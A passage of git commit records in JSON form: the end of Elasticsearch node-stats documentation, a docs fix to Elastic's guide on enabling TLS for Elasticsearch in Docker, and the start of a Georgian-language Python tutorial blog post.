number of unallocated bytes in all file stores\n\n`fs.total.available_in_bytes`::\n\tTotal number of bytes available to this Java virtual machine on all file stores\n\n`fs.data`::\n\tList of all file stores\n\n`fs.data.path`::\n\tPath to the file store\n\n`fs.data.mount`::\n\tMount point of the file store (ex: \/dev\/sda2)\n\n`fs.data.type`::\n\tType of the file store (ex: ext4)\n\n`fs.data.total_in_bytes`::\n\tTotal size (in bytes) of the file store\n\n`fs.data.free_in_bytes`::\n\tTotal number of unallocated bytes in the file store\n\n`fs.data.available_in_bytes`::\n\tTotal number of bytes available to this Java virtual machine on this file store\n\n`fs.data.spins` (Linux only)::\n\tIndicates if the file store is backed by spinning storage.\n\t`null` means we could not determine it, `true` means the device possibly spins\n\t and `false` means it does not (ex: solid-state disks).\n\n[float]\n[[os-stats]]\n==== Operating System statistics\n\nThe `os` flag can be set to retrieve statistics that concern\nthe operating system:\n\n`os.timestamp`::\n\tLast time the operating system statistics have been refreshed\n\n`os.percent`::\n Recent CPU usage for the whole system, or -1 if not supported\n\n`os.load_average`::\n\tSystem load average for the last minute, or -1 if not supported\n\n`os.mem.total_in_bytes`::\n\tTotal amount of physical memory in bytes\n\n`os.mem.free_in_bytes`::\n\tAmount of free physical memory in bytes\n\n`os.mem.free_percent`::\n\tPercentage of free memory\n\n`os.mem.used_in_bytes`::\n\tAmount of used physical memory in bytes\n\n`os.mem.used_percent`::\n\tPercentage of used memory\n\n`os.swap.total_in_bytes`::\n\tTotal amount of swap space in bytes\n\n`os.swap.free_in_bytes`::\n\tAmount of free swap space in bytes\n\n`os.swap.used_in_bytes`::\n\tAmount of used swap space in bytes\n\n\n[float]\n[[process-stats]]\n==== Process statistics\n\nThe `process` flag can be set to retrieve statistics that concern\nthe current running process:\n\n`process.timestamp`::\n\tLast time the process statistics have been refreshed\n\n`process.open_file_descriptors`::\n\tNumber of opened file descriptors associated with the current process, or -1 if not supported\n\n`process.max_file_descriptors`::\n\tMaximum number of file descriptors allowed on the system, or -1 if not supported\n\n`process.cpu.percent`::\n\tCPU usage in percent, or -1 if not known at the time the stats are computed\n\n`process.cpu.total_in_millis`::\n\tCPU time (in milliseconds) used by the process on which the Java virtual machine is running, or -1 if not supported\n\n`process.mem.total_virtual_in_bytes`::\n\tSize in bytes of virtual memory that is guaranteed to be available to the running process\n\n\n[float]\n[[field-data]]\n=== Field data statistics\n\nYou can get information about field data memory usage on node\nlevel or on index level.\n\n[source,js]\n--------------------------------------------------\n# Node Stats\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices\/?fields=field1,field2&pretty'\n\n# Indices Stat\ncurl -XGET 'http:\/\/localhost:9200\/_stats\/fielddata\/?fields=field1,field2&pretty'\n\n# You can use wildcards for field names\ncurl -XGET 'http:\/\/localhost:9200\/_stats\/fielddata\/?fields=field*&pretty'\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices\/?fields=field*&pretty'\n--------------------------------------------------\n\n[float]\n[[search-groups]]\n=== Search groups\n\nYou can get statistics about search groups for searches executed\non this node.\n\n[source,js]\n--------------------------------------------------\n# All groups with all stats\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats?pretty&groups=_all'\n\n# Some groups from just the indices stats\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices?pretty&groups=foo,bar'\n--------------------------------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c83fe8c857dd6efb1b5635144d7dad52ba23711","subject":"[DOCS] Fix wrapped lines in code blocks of TLS getting started guide","message":"[DOCS] Fix wrapped lines in code blocks of TLS getting started guide\n\nRelates elastic\/x-pack-elasticsearch#2970\n\nOriginal commit: elastic\/x-pack-elasticsearch@a9de6fcdfb1c6aba63203ebaccd13de7b9134157\n","repos":"vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/en\/security\/securing-communications\/configuring-tls-docker.asciidoc","new_file":"docs\/en\/security\/securing-communications\/configuring-tls-docker.asciidoc","new_contents":"[role=\"xpack\"]\n[[configuring-tls-docker]]\n=== Encrypting Communications in an {es} Docker Image\n\nStarting with version 6.0.0, {security} (Gold, Platinum or Enterprise subscriptions) https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/6.0\/breaking-6.0.0-xes.html[requires SSL\/TLS]\nencryption for the transport networking layer.\n\nThis section demonstrates an easy path to get started with SSL\/TLS for both\nHTTPS and transport using the `elasticsearch-platinum` docker image.\n\nFor further details, please refer to\n{xpack-ref}\/encrypting-communications.html[Encrypting Communications] and\nhttps:\/\/www.elastic.co\/subscriptions[available subscriptions].\n\n[float]\n==== Prepare the environment\n\n<<docker,Install {es} with Docker>>. \n\nInside a new, empty, directory create the following **four files**:\n\n`instances.yml`:\n[\"source\",\"yaml\"]\n----\ninstances:\n - name: es01\n dns:\n - es01 <1>\n - localhost\n ip:\n - 127.0.0.1\n - name: es02\n dns:\n - es02\n - localhost\n ip:\n - 127.0.0.1\n----\n<1> Allow use of embedded Docker DNS server names.\n\n`.env`:\n[source,yaml]\n----\nCERTS_DIR=\/usr\/share\/elasticsearch\/config\/x-pack\/certificates <1>\nELASTIC_PASSWORD=PleaseChangeMe <2>\n----\n<1> The path, inside the Docker image, where certificates are expected to be found.\n<2> Initial password for the `elastic` user.\n\n[[getting-starter-tls-create-certs-composefile]]\n`create-certs.yml`:\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so a\n`create-certs.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[\"source\",\"yaml\",subs=\"attributes\"]\n----\nversion: '2.2'\nservices:\n create_certs:\n container_name: create_certs\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n command: >\n bash -c '\n if [[ ! -d config\/x-pack\/certificates\/certs ]]; then\n mkdir config\/x-pack\/certificates\/certs;\n fi;\n if [[ ! -f \/local\/certs\/bundle.zip ]]; then\n bin\/x-pack\/certgen --silent --in config\/x-pack\/certificates\/instances.yml --out config\/x-pack\/certificates\/certs\/bundle.zip;\n unzip config\/x-pack\/certificates\/certs\/bundle.zip -d config\/x-pack\/certificates\/certs; <1>\n fi;\n chgrp -R 0 config\/x-pack\/certificates\/certs\n '\n user: $\\{UID:-1000\\}\n working_dir: \/usr\/share\/elasticsearch\n volumes: ['.:\/usr\/share\/elasticsearch\/config\/x-pack\/certificates']\n----\n\n<1> The new node certificates and CA certificate+key are placed under the local directory `certs`.\nendif::[]\n\n[[getting-starter-tls-create-docker-compose]]\n`docker-compose.yml`:\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[\"source\",\"yaml\",subs=\"attributes\"]\n----\nversion: '2.2'\nservices:\n es01:\n container_name: es01\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n environment:\n - node.name=es01\n - discovery.zen.minimum_master_nodes=2\n - ELASTIC_PASSWORD=$ELASTIC_PASSWORD <1>\n - \"ES_JAVA_OPTS=-Xms512m -Xmx512m\"\n - xpack.security.http.ssl.enabled=true\n - xpack.security.transport.ssl.enabled=true\n - xpack.security.transport.ssl.verification_mode=certificate <2>\n - xpack.ssl.certificate_authorities=$CERTS_DIR\/ca\/ca.crt\n - xpack.ssl.certificate=$CERTS_DIR\/es01\/es01.crt\n - xpack.ssl.key=$CERTS_DIR\/es01\/es01.key\n volumes: ['esdata_01:\/usr\/share\/elasticsearch\/data', '.\/certs:$CERTS_DIR']\n ports:\n - 9200:9200\n healthcheck:\n test: curl --cacert $CERTS_DIR\/ca\/ca.crt -s https:\/\/localhost:9200 >\/dev\/null; if [[ $$? == 52 ]]; then echo 0; else echo 1; fi\n interval: 30s\n timeout: 10s\n retries: 5\n es02:\n container_name: es02\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n environment:\n - node.name=es02\n - discovery.zen.minimum_master_nodes=2\n - ELASTIC_PASSWORD=$ELASTIC_PASSWORD\n - discovery.zen.ping.unicast.hosts=es01\n - \"ES_JAVA_OPTS=-Xms512m -Xmx512m\"\n - xpack.security.http.ssl.enabled=true\n - xpack.security.transport.ssl.enabled=true\n - xpack.security.transport.ssl.verification_mode=certificate\n - xpack.ssl.certificate_authorities=$CERTS_DIR\/ca\/ca.crt\n - xpack.ssl.certificate=$CERTS_DIR\/es02\/es02.crt\n - xpack.ssl.key=$CERTS_DIR\/es02\/es02.key\n volumes: ['esdata_02:\/usr\/share\/elasticsearch\/data', '.\/certs:$CERTS_DIR']\n wait_until_ready:\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n command: \/usr\/bin\/true\n depends_on: {\"es01\": {\"condition\": \"service_healthy\"}}\nvolumes: {\"esdata_01\": {\"driver\": \"local\"}, \"esdata_02\": {\"driver\": \"local\"}}\n----\n\n<1> Bootstrap `elastic` with the password defined in `.env`. See {xpack-ref}\/setting-up-authentication.html#bootstrap-elastic-passwords[the Elastic Bootstrap Password].\n<2> Disable verification of authenticity for inter-node communication. Allows\ncreating self-signed certificates without having to pin specific internal IP addresses.\nendif::[]\n\n[float]\n==== Run the example\n. Generate the certificates (only needed once):\n+\n--\n[\"source\",\"sh\"]\n----\ndocker-compose -f create-certs.yml up\n----\n--\n. Start two {es} nodes configured for SSL\/TLS:\n+\n--\n[\"source\",\"sh\"]\n----\ndocker-compose up -d\n----\n--\n. Access the {es} API over SSL\/TLS using the bootstrapped password:\n+\n--\n[\"source\",\"sh\"]\n----\ncurl --cacert certs\/ca\/ca.crt -u elastic:PleaseChangeMe https:\/\/localhost:9200\n----\n\/\/ NOTCONSOLE\n--\n. The `setup-passwords` tool can also be used to generate random passwords for\nall users:\n+\n--\n[\"source\",\"sh\"]\n----\ndocker exec es01 \/bin\/bash -c \"bin\/x-pack\/setup-passwords auto --batch -Expack.ssl.certificate=x-pack\/certificates\/es01\/es01.crt -Expack.ssl.certificate_authorities=x-pack\/certificates\/ca\/ca.crt -Expack.ssl.key=x-pack\/certificates\/es01\/es01.key --url https:\/\/localhost:9200\"\n----\n--\n","old_contents":"[role=\"xpack\"]\n[[configuring-tls-docker]]\n=== Encrypting Communications in an {es} Docker Image\n\nStarting with version 6.0.0, {security} (Gold, Platinum or Enterprise subscriptions) https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/6.0\/breaking-6.0.0-xes.html[requires SSL\/TLS]\nencryption for the transport networking layer.\n\nThis section demonstrates an easy path to get started with SSL\/TLS for both\nHTTPS and transport using the `elasticsearch-platinum` docker image.\n\nFor further details, please refer to\n{xpack-ref}\/encrypting-communications.html[Encrypting Communications] and\nhttps:\/\/www.elastic.co\/subscriptions[available subscriptions].\n\n[float]\n==== Prepare the environment\n\n<<docker,Install {es} with Docker>>. \n\nInside a new, empty, directory create the following **four files**:\n\n`instances.yml`:\n[\"source\",\"yaml\"]\n----\ninstances:\n - name: es01\n dns:\n - es01 <1>\n - localhost\n ip:\n - 127.0.0.1\n - name: es02\n dns:\n - es02\n - localhost\n ip:\n - 127.0.0.1\n----\n<1> Allow use of embedded Docker DNS server names.\n\n`.env`:\n[source,yaml]\n----\nCERTS_DIR=\/usr\/share\/elasticsearch\/config\/x-pack\/certificates <1>\nELASTIC_PASSWORD=PleaseChangeMe <2>\n----\n<1> The path, inside the Docker image, where certificates are expected to be found.\n<2> Initial password for the `elastic` user.\n\n[[getting-starter-tls-create-certs-composefile]]\n`create-certs.yml`:\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so a\n`create-certs.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[\"source\",\"yaml\",subs=\"attributes\"]\n----\nversion: '2.2'\nservices:\n create_certs:\n container_name: create_certs\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n command: >\n bash -c '\n if [[ ! -d config\/x-pack\/certificates\/certs ]]; then\n mkdir config\/x-pack\/certificates\/certs;\n fi;\n if [[ ! -f \/local\/certs\/bundle.zip ]]; then\n bin\/x-pack\/certgen --silent --in config\/x-pack\/certificates\/instances.yml --out config\/x-pack\/certificates\/certs\/bundle.zip;\n unzip config\/x-pack\/certificates\/certs\/bundle.zip -d config\/x-pack\/certificates\/certs; <1>\n fi;\n chgrp -R 0 config\/x-pack\/certificates\/certs\n '\n user: $\\{UID:-1000\\}\n working_dir: \/usr\/share\/elasticsearch\n volumes: ['.:\/usr\/share\/elasticsearch\/config\/x-pack\/certificates']\n----\n\n<1> The new node certificates and CA certificate+key are placed under the local directory `certs`.\nendif::[]\n\n[[getting-starter-tls-create-docker-compose]]\n`docker-compose.yml`:\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[\"source\",\"yaml\",subs=\"attributes\"]\n----\nversion: '2.2'\nservices:\n es01:\n container_name: es01\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n environment:\n - node.name=es01\n - discovery.zen.minimum_master_nodes=2\n - ELASTIC_PASSWORD=$ELASTIC_PASSWORD <1>\n - \"ES_JAVA_OPTS=-Xms512m -Xmx512m\"\n - xpack.security.http.ssl.enabled=true\n - xpack.security.transport.ssl.enabled=true\n - xpack.security.transport.ssl.verification_mode=certificate <2>\n - xpack.ssl.certificate_authorities=$CERTS_DIR\/ca\/ca.crt\n - xpack.ssl.certificate=$CERTS_DIR\/es01\/es01.crt\n - xpack.ssl.key=$CERTS_DIR\/es01\/es01.key\n volumes: ['esdata_01:\/usr\/share\/elasticsearch\/data', '.\/certs:$CERTS_DIR']\n ports:\n - 9200:9200\n healthcheck:\n test: curl --cacert $CERTS_DIR\/ca\/ca.crt -s https:\/\/localhost:9200 >\/dev\/null; if [[ $$? == 52 ]]; then echo 0; else echo 1; fi\n interval: 30s\n timeout: 10s\n retries: 5\n es02:\n container_name: es02\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n environment:\n - node.name=es02\n - discovery.zen.minimum_master_nodes=2\n - ELASTIC_PASSWORD=$ELASTIC_PASSWORD\n - discovery.zen.ping.unicast.hosts=es01\n - \"ES_JAVA_OPTS=-Xms512m -Xmx512m\"\n - xpack.security.http.ssl.enabled=true\n - xpack.security.transport.ssl.enabled=true\n - xpack.security.transport.ssl.verification_mode=certificate\n - xpack.ssl.certificate_authorities=$CERTS_DIR\/ca\/ca.crt\n - xpack.ssl.certificate=$CERTS_DIR\/es02\/es02.crt\n - xpack.ssl.key=$CERTS_DIR\/es02\/es02.key\n volumes: ['esdata_02:\/usr\/share\/elasticsearch\/data', '.\/certs:$CERTS_DIR']\n wait_until_ready:\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n command: \/usr\/bin\/true\n depends_on: {\"es01\": {\"condition\": \"service_healthy\"}}\nvolumes: {\"esdata_01\": {\"driver\": \"local\"}, \"esdata_02\": {\"driver\": \"local\"}}\n----\n\n<1> Bootstrap `elastic` with the password defined in `.env`. See {xpack-ref}\/setting-up-authentication.html#bootstrap-elastic-passwords[the Elastic Bootstrap Password].\n<2> Disable verification of authenticity for inter-node communication. Allows\ncreating self-signed certificates without having to pin specific internal IP addresses.\nendif::[]\n\n[float]\n==== Run the example\n. Generate the certificates (only needed once):\n+\n--\n[\"source\",\"sh\"]\n----\ndocker-compose -f create-certs.yml up\n----\n--\n. Start two {es} nodes configured for SSL\/TLS:\n+\n--\n[\"source\",\"sh\"]\n----\ndocker-compose up -d\n----\n--\n. Access the {es} API over SSL\/TLS using the bootstrapped password:\n+\n--\n[\"source\",\"sh\"]\n----\ncurl --cacert certs\/ca\/ca.crt -u elastic:PleaseChangeMe\nhttps:\/\/localhost:9200\n----\n\/\/ NOTCONSOLE\n--\n. The `setup-passwords` tool can also be used to generate random passwords for\nall users:\n+\n--\n[\"source\",\"sh\"]\n----\ndocker exec es01 \/bin\/bash -c \"bin\/x-pack\/setup-passwords auto --batch\n-Expack.ssl.certificate=x-pack\/certificates\/es01\/es01.crt\n-Expack.ssl.certificate_authorities=x-pack\/certificates\/ca\/ca.crt\n-Expack.ssl.key=x-pack\/certificates\/es01\/es01.key\n--url https:\/\/localhost:9200\"\n----\n--\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea769e68773060b2d2e0719917aa476f7ed6af63","subject":"Update 2016-01-24-the-python-tutorial-part-1.adoc","message":"Update 2016-01-24-the-python-tutorial-part-1.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-24-the-python-tutorial-part-1.adoc","new_file":"_posts\/2016-01-24-the-python-tutorial-part-1.adoc","new_contents":"= \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10e1\u10d0\u10ee\u10d4\u10da\u10db\u10eb\u10e6\u10d5\u10d0\u10dc\u10d4\u10da\u10dd - \u10dc\u10d0\u10ec\u10d8\u10da\u10d8 1\n:hp-alt-title: the python tutorial - part 1\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10d0\u10e0\u10d8\u10e1 \u10d0\u10d3\u10d5\u10d8\u10da\u10d0\u10d3 \u10e1\u10d0\u10e1\u10ec\u10d0\u10d5\u10da\u10d8, \u10eb\u10da\u10d8\u10d4\u10e0\u10d8 \u10de\u10e0\u10dd\u10d2\u10e0\u10d0\u10db\u10d8\u10e0\u10d4\u10d1\u10d8\u10e1 \u10d4\u10dc\u10d0. \u10db\u10d0\u10e1 \u10d0\u10e5\u10d5\u10e1 \u10d4\u10e4\u10d4\u10e5\u10e2\u10e3\u10e0\u10d8 \u10db\u10d0\u10e6\u10d0\u10da\u10d8 \u10d3\u10dd\u10dc\u10d8\u10e1 \u10db\u10dd\u10dc\u10d0\u10ea\u10d4\u10db\u10d7\u10d0 \u10e1\u10e2\u10e0\u10e3\u10e5\u10e2\u10e3\u10e0\u10d4\u10d1\u10d8 \u10d3\u10d0 \u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d8, \u10db\u10d0\u10d2\u10e0\u10d0\u10db \u10d4\u10e4\u10d4\u10e5\u10e2\u10e3\u10e0\u10d8 \u10db\u10d8\u10d3\u10d2\u10dd\u10db\u10d0 \u10dd\u10d1\u10d8\u10d4\u10e5\u10e2\u10d6\u10d4 \u10dd\u10e0\u10d8\u10d4\u10dc\u10e2\u10d8\u10e0\u10d4\u10d1\u10e3\u10da\u10d8 \u10de\u10e0\u10dd\u10d2\u10e0\u10d0\u10db\u10d8\u10e0\u10d4\u10d1\u10d8\u10e1(OOP). \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d4\u10da\u10d4\u10d2\u10d0\u10dc\u10e2\u10e3\u10e0\u10d8 \u10e1\u10d8\u10dc\u10e2\u10d0\u10e5\u10e1\u10d8 \u10d3\u10d0 \u10d3\u10d8\u10dc\u10d0\u10db\u10d8\u10e3\u10e0\u10dd\u10d1\u10d0\u10e1\u10d7\u10d0\u10dc \u10d4\u10e0\u10d7\u10d0\u10d3 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d8\u10e0\u10d4\u10d1\u10e3\u10da\u10d8 \u10d2\u10d0\u10e0\u10d4\u10db\u10dd, \u10e5\u10db\u10dc\u10d8\u10e1 \u10d8\u10d3\u10d4\u10d0\u10da\u10e3\u10e0 \u10d4\u10dc\u10d0\u10e1 \u10e1\u10d9\u10e0\u10d8\u10de\u10e2\u10d8\u10dc\u10d2\u10d8\u10e1\u10d7\u10d5\u10d8\u10e1(scripting) \u10d3\u10d0 \u10e1\u10ec\u10e0\u10d0\u10e4\u10d8 application development-\u10d7\u10d5\u10d8\u10e1 \u10d1\u10d4\u10d5\u10e0 \u10e1\u10e4\u10d4\u10e0\u10dd\u10e8\u10d8 \u10e1\u10d0\u10e3\u10d9\u10d4\u10d7\u10d4\u10e1\u10dd \u10de\u10da\u10d0\u10e2\u10e4\u10dd\u10e0\u10db\u10d4\u10d1\u10d6\u10d4.\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d0\u10e2\u10dd\u10e0\u10d8 \u10d3\u10d0 \u10db\u10d7\u10da\u10d8\u10d0\u10dc\u10d8 \u10e1\u10e2\u10d0\u10dc\u10d3\u10d0\u10e0\u10e2\u10e3\u10da\u10d8 \u10d1\u10d8\u10d1\u10da\u10d8\u10dd\u10d7\u10d4\u10d9\u10d0 \u10d7\u10d0\u10d5\u10d8\u10e1\u10e3\u10e4\u10da\u10d0\u10d3 \u10ee\u10d4\u10da\u10db\u10d8\u10e1\u10d0\u10ec\u10d5\u10d3\u10dd\u10db\u10d8\u10d0 \u10e0\u10dd\u10d2\u10dd\u10e0\u10ea \u10d9\u10dd\u10d3\u10d8\u10e1 \u10ec\u10e7\u10d0\u10e0\u10dd\u10e1(Source) \u10d0\u10e1\u10d4\u10d5\u10d4 \u10d1\u10d8\u10dc\u10d0\u10e0\u10e3\u10da\u10d8(Binary) \u10e4\u10dd\u10e0\u10db\u10d8\u10d7 \u10e7\u10d5\u10d4\u10da\u10d0 \u10eb\u10d8\u10e0\u10d8\u10d7\u10d0\u10d3 \u10de\u10da\u10d0\u10e2\u10e4\u10dd\u10e0\u10db\u10d0\u10d6\u10d4 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10dd\u10e4\u10d8\u10ea\u10d8\u10d0\u10da\u10e3\u10e0\u10d8 \u10d5\u10d4\u10d1 \u10e1\u10d0\u10d8\u10e2\u10d8\u10d3\u10d0\u10dc https:\/\/www.python.org \u10d3\u10d0 \u10e8\u10d4\u10d8\u10eb\u10da\u10d4\u10d1\u10d0 \u10d7\u10d0\u10d5\u10d8\u10e1\u10e3\u10e4\u10da\u10d0\u10d3 \u10d2\u10d0\u10d5\u10e0\u10ea\u10d4\u10da\u10d4\u10d1\u10d0. \u10d0\u10e1\u10d4\u10d5\u10d4 \u10d0\u10db\u10d0\u10d5\u10d4 \u10e1\u10d0\u10d8\u10e2\u10d6\u10d4 \u10d2\u10d0\u10d5\u10e0\u10ea\u10d4\u10da\u10d4\u10d1\u10e3\u10da\u10d8\u10d0 \u10e3\u10e4\u10d0\u10e1\u10dd \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10db\u10dd\u10d3\u10e3\u10da\u10d4\u10d1\u10d8, \u10de\u10e0\u10dd\u10d2\u10e0\u10d0\u10db\u10d4\u10d1\u10d8, \u10ee\u10d4\u10da\u10e1\u10d0\u10ec\u10e7\u10dd\u10d4\u10d1\u10d8 \u10d3\u10d0 \u10d3\u10d0\u10db\u10d0\u10d7\u10d4\u10d1\u10d8\u10d7\u10d8 \u10d3\u10dd\u10d9\u10e3\u10db\u10d4\u10dc\u10e2\u10d0\u10ea\u10d8\u10d0.\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d0\u10e2\u10dd\u10e0\u10e8\u10d8 \u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d0\u10d3 \u10d2\u10e0\u10eb\u10d4\u10da\u10d3\u10d4\u10d1\u10d0 \u10d0\u10ee\u10d0\u10da\u10d8 \u10e4\u10e3\u10dc\u10e5\u10ea\u10d8\u10d4\u10d1\u10d8\u10e1 \u10d3\u10d0 \u10db\u10dd\u10dc\u10d0\u10ea\u10d4\u10db\u10d7\u10d0 \u10e2\u10d8\u10de\u10d4\u10d1\u10d8\u10e1 \u10d2\u10d0\u10dc\u10ee\u10dd\u10e0\u10ea\u10d8\u10d4\u10da\u10d4\u10d1\u10d0 C \u10d0\u10dc C++ \u10d6\u10d4 (\u10d0\u10dc \u10e1\u10ee\u10d5\u10d0 \u10d4\u10dc\u10d4\u10d1\u10d6\u10d4 \u10d2\u10d0\u10db\u10dd\u10eb\u10d0\u10ee\u10d4\u10d1\u10e3\u10da\u10d8 C-\u10d3\u10d0\u10dc). \u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10d0\u10e0\u10d8\u10e1 \u10d0\u10e1\u10d4\u10d5\u10d4 \u10e8\u10d4\u10e1\u10d0\u10e4\u10d4\u10e0\u10d8\u10e1\u10d8 \u10e0\u10dd\u10d2\u10dd\u10e0\u10ea \u10d2\u10d0\u10e4\u10d0\u10e0\u10d7\u10dd\u10d4\u10d1\u10d8\u10e1 \u10d4\u10dc\u10d0 \u10d0\u10de\u10da\u10d8\u10d9\u10d0\u10ea\u10d8\u10d8\u10e1 \u10d9\u10dd\u10dc\u10e4\u10d8\u10d2\u10e3\u10e0\u10d0\u10ea\u10d8\u10d8\u10e1\u10d7\u10d5\u10d8\u10e1.\n\n\u10d4\u10e1 \u10d2\u10d0\u10d9\u10d5\u10d4\u10d7\u10d8\u10da\u10d8 \u10d0\u10e0\u10d0\u10e4\u10dd\u10e0\u10db\u10d0\u10da\u10e3\u10e0\u10d0\u10d3 \u10ec\u10d0\u10e0\u10e3\u10d3\u10d2\u10d4\u10dc\u10e1 \u10db\u10d9\u10d8\u10d7\u10ee\u10d5\u10d4\u10da\u10e1, \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10eb\u10d8\u10e0\u10d8\u10d7\u10d0\u10d3 \u10ea\u10dc\u10d4\u10d1\u10d4\u10d1\u10e1, \u10d7\u10d5\u10d8\u10e1\u10d4\u10d1\u10d4\u10d1\u10e1 \u10d3\u10d0 \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d0\u10e1. \u10d4\u10e1 \u10ee\u10d4\u10da\u10e1 \u10e3\u10ec\u10e7\u10dd\u10d1\u10e1 \u10e5\u10dd\u10dc\u10d3\u10d4\u10e1 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d0\u10e2\u10dd\u10e0\u10e8\u10d8 \u10de\u10e0\u10d0\u10e5\u10e2\u10d8\u10d9\u10e3\u10da\u10d8 \u10d2\u10d0\u10db\u10dd\u10ea\u10d3\u10d8\u10da\u10d4\u10d1\u10d0.\n\n\u10d0\u10db\u10d8\u10e1\u10d7\u10d5\u10d8\u10e1 \u10d0\u10e6\u10ec\u10d4\u10e0\u10d8\u10da\u10d8\u10d0 \u10e1\u10e2\u10d0\u10dc\u10d3\u10d0\u10e0\u10e2\u10e3\u10da\u10d8 \u10dd\u10d1\u10d8\u10d4\u10e5\u10e2\u10d4\u10d1\u10d8 \u10d3\u10d0 \u10db\u10dd\u10d3\u10e3\u10da\u10d4\u10d1\u10d8, \u10d8\u10ee\u10d8\u10da\u10d4\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10e1\u10e2\u10d0\u10dc\u10d3\u10d0\u10e0\u10e2\u10e3\u10da\u10d8 \u10d1\u10d8\u10d1\u10da\u10d8\u10dd\u10d7\u10d4\u10d9\u10d0(https:\/\/docs.python.org\/3.5\/library\/index.html#library-index[Python Standard Library]). https:\/\/docs.python.org\/3.5\/reference\/index.html#reference-index[Python Language Reference] \u10d8\u10eb\u10da\u10d4\u10d5\u10d0 \u10e3\u10e4\u10e0\u10dd \u10e4\u10dd\u10e0\u10db\u10d0\u10da\u10e3\u10e0 \u10d2\u10d0\u10dc\u10db\u10d0\u10e0\u10e2\u10d4\u10d1\u10d0\u10e1 \u10d4\u10dc\u10d0\u10d6\u10d4. \u10d9\u10dd\u10d3\u10d8\u10e1 \u10d3\u10d0\u10ec\u10d4\u10e0\u10d0 \u10e8\u10d4\u10e1\u10d0\u10eb\u10da\u10d4\u10d1\u10d4\u10da\u10d8\u10d0 C, C++ \u10d6\u10d4, \u10ec\u10d0\u10d8\u10d9\u10d8\u10d7\u10ee\u10d4\u10d7 https:\/\/docs.python.org\/3.5\/extending\/index.html#extending-index[Extending and Embedding the Python Interpreter] \u10d3\u10d0 https:\/\/docs.python.org\/3.5\/c-api\/index.html#c-api-index[Python\/C API Reference Manual.] \u10d0\u10e1\u10d4\u10d5\u10d4 \u10d0\u10e0\u10e1\u10d4\u10d1\u10dd\u10d1\u10e1 \u10e0\u10d0\u10db\u10d3\u10d4\u10dc\u10d8\u10db\u10d4 \u10ec\u10d8\u10d2\u10dc\u10d8, \u10e0\u10dd\u10db\u10d4\u10da\u10d8\u10ea \u10db\u10dd\u10d8\u10ea\u10d0\u10d5\u10e1 \u10de\u10d8\u10d7\u10dd\u10dc\u10e1 \u10e1\u10d8\u10e6\u10e0\u10db\u10d8\u10e1\u10d4\u10e3\u10da\u10d0\u10d3.\n\n\u10e8\u10d4\u10e1\u10d0\u10d5\u10d0\u10da\u10d8:\n\n\t* 1. Whetting Your Appetite\n\t* 2. Using the Python Interpreter\n\t\t**2.1. Invoking the Interpreter\n\t\t\t***2.1.1. Argument Passing\n\t\t\t***2.1.2. Interactive Mode\n\t\t**2.2. The Interpreter and Its Environment\n\t\t\t***2.2.1. Source Code Encoding\n\t* 3. An Informal Introduction to Python\n\t\t**3.1. Using Python as a Calculator\n\t\t\t***3.1.1. Numbers\n\t\t\t***3.1.2. Strings\n\t\t\t***3.1.3. Lists\n\t\t**3.2. First 